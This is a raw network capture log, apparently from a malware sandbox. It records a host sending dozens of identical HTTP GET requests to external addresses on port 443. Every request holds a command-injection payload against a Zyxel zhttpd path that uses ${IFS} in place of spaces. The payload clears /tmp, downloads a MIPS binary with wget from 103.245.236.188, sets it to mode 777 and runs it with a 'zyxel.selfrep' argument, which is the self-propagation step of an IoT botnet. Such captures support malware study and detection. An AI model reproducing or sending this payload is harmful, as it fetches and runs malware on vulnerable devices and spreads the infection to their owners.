                                                Jan 12, 2024 18:16:31.641671896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6395192.168.2.2341450162.191.121.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641705036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6396192.168.2.2346928129.2.48.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641768932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6397192.168.2.2352028216.28.117.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641813993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6398192.168.2.2355346210.13.4.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641840935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6399192.168.2.2336962195.138.173.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641910076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6400192.168.2.234261665.142.108.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641911030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6401192.168.2.235863050.244.113.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641957998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6402192.168.2.233902834.229.46.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.641989946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6403192.168.2.235030864.122.135.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642041922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6404192.168.2.2336296204.67.182.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642077923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6405192.168.2.235810078.150.202.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642117977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6406192.168.2.2341178135.181.20.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642187119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6407192.168.2.2358490179.89.164.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642204046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6408192.168.2.233326088.120.95.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642246008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6409192.168.2.235187071.6.47.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642276049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6410192.168.2.233718067.83.180.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642328024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6411192.168.2.2333220160.54.104.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642374992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6412192.168.2.2337302146.83.71.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642398119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6413192.168.2.233395213.105.66.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642467022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6414192.168.2.235156012.72.78.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642487049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6415192.168.2.2350960199.55.113.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642560959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6416192.168.2.2333162107.3.3.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642595053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6417192.168.2.2334104133.145.99.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642652988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6418192.168.2.234966236.185.122.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642697096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6419192.168.2.2360434189.239.142.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642725945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6420192.168.2.2338316180.86.68.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642757893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6421192.168.2.2351526178.151.232.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642785072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6422192.168.2.235184836.173.250.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642836094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6423192.168.2.2334384151.177.105.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642879963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6424192.168.2.2342216140.5.247.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642919064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6425192.168.2.23327708.88.69.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642942905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6426192.168.2.2343830190.181.116.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.642997026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6427192.168.2.2350124164.127.1.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643054962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6428192.168.2.234819679.106.251.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643062115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6429192.168.2.2338402144.158.70.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643109083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6430192.168.2.2333908182.31.198.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643165112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6431192.168.2.236000677.212.205.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643183947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6432192.168.2.2348896169.72.97.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643223047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6433192.168.2.233287857.49.235.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643286943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6434192.168.2.234545899.44.147.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643321037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6435192.168.2.234827459.82.37.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643354893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6436192.168.2.2352558203.97.166.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643415928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6437192.168.2.2339030124.80.64.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643424034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6438192.168.2.2334340220.199.239.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643490076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6439192.168.2.2346660128.43.235.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643532038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6440192.168.2.2355014168.112.32.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643585920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6441192.168.2.2340700188.136.97.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643609047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6442192.168.2.233565276.224.133.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643639088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6443192.168.2.235954678.94.18.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643688917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6444192.168.2.2346716184.198.68.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643739939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6445192.168.2.233779813.80.113.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643781900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6446192.168.2.2349902108.199.108.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643822908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6447192.168.2.2360614216.147.218.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643841028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6448192.168.2.234030854.176.28.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643894911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6449192.168.2.2344346121.91.169.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643925905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6450192.168.2.2357950189.186.236.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.643959999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6451192.168.2.235095827.137.248.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644022942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6452192.168.2.2357888158.221.209.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644068003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6453192.168.2.2351264141.146.69.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644133091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6454192.168.2.2337244169.202.110.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644141912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6455192.168.2.235532831.220.223.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644176006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6456192.168.2.2354930178.94.205.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644247055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6457192.168.2.2351130122.252.35.140443
                                                TimestampBytes transferredDirectionData
